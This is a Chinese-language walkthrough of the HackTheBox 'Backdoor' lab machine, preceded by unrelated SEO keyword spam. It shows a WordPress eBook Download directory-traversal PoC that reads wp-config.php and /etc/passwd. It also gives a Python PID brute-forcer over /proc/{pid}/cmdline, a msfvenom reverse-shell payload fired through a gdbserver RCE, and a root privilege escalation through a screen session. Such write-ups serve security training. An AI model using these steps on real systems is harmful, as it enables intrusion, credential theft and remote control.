免费网站模版建设,上海自贸区注册公司的条件,页面做的比较炫酷的网站,做搜狗网站优化点击软Backdoor Enumeration
nmap
第一次扫描发现系统对外开放了22#xff0c;80和1337端口#xff0c;端口详细信息如下 22端口对应的是ssh服务#xff0c;80端口使用Apache#xff0c;title上写着backdoor#xff0c;而且可以看出使用了wordpress#xff0c;1337端口暂时还…Backdoor Enumeration
nmap
第一次扫描发现系统对外开放了2280和1337端口端口详细信息如下 22端口对应的是ssh服务80端口使用Apachetitle上写着backdoor而且可以看出使用了wordpress1337端口暂时还不能确定
TCP/80
访问页面经典的wordpress风格一访问页面就可以看到页面四个链接分别是homeaboutblogcontact点击home跳转失败显示无法识别域名backdoor.htb需要将其添加到/etc/hosts中。剩下三个也只能看到一些基础信息没什么好玩的 配置完成能够解析域名后访问该链接但是并没有发现什么可以利用的东西 可以尝试枚举一些目录wordpress默认的插件安装目录是/wp-content/plugins 可以看到默认的index.php目录已经被删除可以看到该目录下只有一个电子书下载的插件和一个hello.php在电子书下载插件目录中有一个readme文档其中揭露了插件的版本为1.1 Exploitation
WordPress Plugin eBook Download 1.1 - Directory Traversal
在知道了一些基本信息后可以搜索相关内容看看是否存在已知的漏洞可以直接拿来利用 该目录遍历漏洞详情如下可以看到我们需要能够访问filedownload.php文件而在wp-content目录下确实有这个php文件然后利用目录遍历去请求wp-config.php文件从该文件的名字也能看出来其中包含了很多配置信息
# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7[Version Disclosure]http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
[PoC]/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl../../../wp-config.php按照上文Poc读取指定文件然后在其中发现了一些有关数据库的凭据信息 有了一个密码又存在LFI考虑读取/etc/passwd内容然后看某个用户能否使用数据库密码登录有一个user用户但是并不能成功登录ssh
/proc/{PID}/cmdline
在最开始发现系统还对外开放了1337端口但是这个端口使用curlncattelnet等方式均无法访问因为存在LFI可以读取远程主机中关于1337端口对应服务的信息
需要使用暴力破解/proc/{pid}/cmdline文件的方式来实现在linux中该文件用于显示运行对应PID进程时的命令可以先运行一个tcpdump程序使用ps -aux | grep tcpdump命令来查看相应程序的pid最后查看/proc/{pid}/cmdline文件现实的就是运行tcpdump的命令
运行tcpdump程序后查看相应程序的pid 将获取到的pid填入对应位置查看15806得到结果如下显示了执行时的命令 Brute Force PID
现在我们可以尝试利用burpsuite的暴力破解来看看1337端口到底在运行什么服务通过简单测试发现可行那么只需要将请求包发送给intruder然后检索1-1000的内容 也可以写python脚本来爆破写一个pid的循环然后请求url最后打印输出
import requests
from bs4 import BeautifulSoupfor i in range(1,1000):url http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl/proc/str(i)/cmdlinereq requests.get(url)print(req.text.replace(scriptwindow.close()/script,))
经过漫长的暴力破解最终在pid为852的进程中看到了1337端口运行着gdbserver GDB是GNU项目的调试器是一种调试工具gdbserver是可以远程运行GDB的一个应用程序搜索发现gdbserver 9.2版本存在rce漏洞 GNU gdbserver 9.2 - Remote Command Execution (RCE)
虽然暂时无法确定目标系统使用的版本但是值得一试 msfvenom -p linux/x64/shell_reverse_tcp LHOST10.10.14.11 LPORT4444 PrependForktrue -orev.bin在本地监听4444端口然后执行指令即可得到shell Privilege Escalation
之前得到的密码也没起到什么作用但是之前在爆破pid时还发现pid为850的进程是root运行的可以看看是什么 screen是一个类似于tmux的终端多路复用器可用于启动会话然后在该会话内打开任意数量的虚拟终端即使窗口不可见或者断开链接在screen中运行的进程也将继续运行会话分离时最初从屏幕启动的进程仍在运行并由本身管理。
screen -dmS root意味着screen会话以分离模式启动该会话被命名为“root”当创建新的屏幕会话时会在/var/run/screen位置创建一个新目录名称为s-{username}在此目录中使用屏幕会话名称创建屏幕会话文件可以使用用户dotguy在本地创建一个屏幕会话名称为test_session
用于附加到为不同用户创建的屏幕会话的默认屏幕语法是screen -x user/session_name 但是提示需要添加终端类型可以输入以下指令
export TERMxterm
screen -x root/root
